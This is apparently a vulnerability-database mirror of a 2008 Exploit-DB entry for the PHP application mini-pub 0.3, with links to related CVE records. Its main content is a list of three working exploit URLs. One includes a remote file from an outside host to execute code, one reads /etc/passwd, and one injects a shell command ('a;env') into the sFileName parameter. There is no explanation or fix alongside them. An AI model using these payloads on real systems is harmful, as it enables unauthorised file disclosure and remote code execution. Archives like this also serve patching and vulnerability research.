Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMuuratsaloEDB-ID:6733
HistoryOct 12, 2008 - 12:00 a.m.

mini-pub 0.3 - File Disclosure / Code Execution

2008-10-1200:00:00
muuratsalo
www.exploit-db.com
34

AI Score

7.4

Confidence

Low

JSON
mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?

2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

# milw0rm.com [2008-10-12]

Related

cve 3
prion 3
cvelist 3
nvd 3
cve
cve
CVE-2008-5580
2008-12-15 18:00:00
CVE-2008-5579
2008-12-15 18:00:00
CVE-2008-5581
2008-12-15 18:00:00
prion
prion
Code injection
2008-12-15 18:00:00
Path traversal
2008-12-15 18:00:00
Remote file inclusion
2008-12-15 18:00:00
cvelist
cvelist
CVE-2008-5580
2008-12-15 17:45:00
CVE-2008-5579
2008-12-15 17:45:00
CVE-2008-5581
2008-12-15 17:45:00
nvd
nvd
CVE-2008-5581
2008-12-15 18:00:00
CVE-2008-5579
2008-12-15 18:00:00
CVE-2008-5580
2008-12-15 18:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:6733
cve3prion3cvelist3nvd3